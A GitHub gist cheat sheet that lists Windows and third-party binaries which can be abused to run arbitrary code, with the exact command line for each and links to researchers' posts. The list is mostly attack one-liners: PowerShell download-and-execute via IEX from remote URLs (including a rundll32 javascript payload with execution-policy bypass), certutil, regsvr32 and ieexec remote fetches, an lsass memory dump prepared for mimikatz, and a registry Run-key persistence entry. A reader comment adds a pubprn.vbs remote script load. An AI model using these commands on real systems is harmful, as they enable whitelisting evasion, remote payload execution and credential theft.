Instantly share code, notes, and snippets.

Embed
What would you like to do?
BinariesThatDoesOtherStuff
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
sqldumper 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
SQLPS.exe
Powershell host
https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
@fsacer

This comment has been minimized.

Copy link

fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment